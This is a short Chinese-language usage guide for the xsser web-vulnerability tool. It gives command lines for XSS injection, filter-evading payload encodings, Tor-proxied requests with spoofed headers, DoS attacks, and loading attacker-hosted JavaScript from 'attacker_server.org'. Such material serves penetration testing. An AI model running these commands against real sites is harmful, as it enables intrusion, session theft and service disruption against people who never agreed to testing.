					xsser

一.简介

	xsser是一个自动框架，检测，利用和报告基于Web应用XSS漏洞。它包含几个选项，试图绕过某些过滤器，以及各种特殊的代码注入技术。

二.用法
	
			
		*向导攻击
		xsser --wizard

		*从一个链接简单注入,url的payload
		xsser -u "http://host.com" --payload "!enter your injection code here!"

		*从文件获取url简单的注射,使用Tor代理和欺骗HTTP引用页头,改变你的 HTTP User-Agent header , 改变超时“20”
		xsser -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" --user-agent "XSSer Pentesting Tool" --timeout "20"

		*多个注射URL,使用不同的字符编码(1.改变负载为十六进制;2.使用 String.FromCharCode()方法编码;3.重编码为16进制,4.十进制编译,5.使用Unescape()方法，
		6.16进制分号,7.编译IP地址，8.使用String.FromCharCode() and Unescape()),使用多线程线程(5):
		xsser -u "http://host.com" --Cem "Hex,Str,Hex,Dex,Une,Hes,Doo,Mix"   --threads "5"

		*详细输出和结果保存到文件(XSSreport.raw):
		xsser -u "http://host.com"  --save

		*当payload有用时，利用“拥有”远程代码
		xsser -u "http://host.com"  --Fr "https://attacker_server.org/path/code.js"

		*当payload有用时，利用本地代码
		xsser -u "http://host.com"  --Fp "<script>alert('xss')</script>"
		
		*从URL简单的注射,使用GET和如果存在任何漏洞,发起DoS，Doss（攻击服务器）:
		xsser -u "http://host.com"  --Dos（攻击浏览器）

		*指定攻击Dom,Coo,Xsa,Xsr,Dcp,Ind,Anchor
		xsser -u http://172.16.2.130/mutillidae/index.php?page=dns-lookup.php --Dom


		


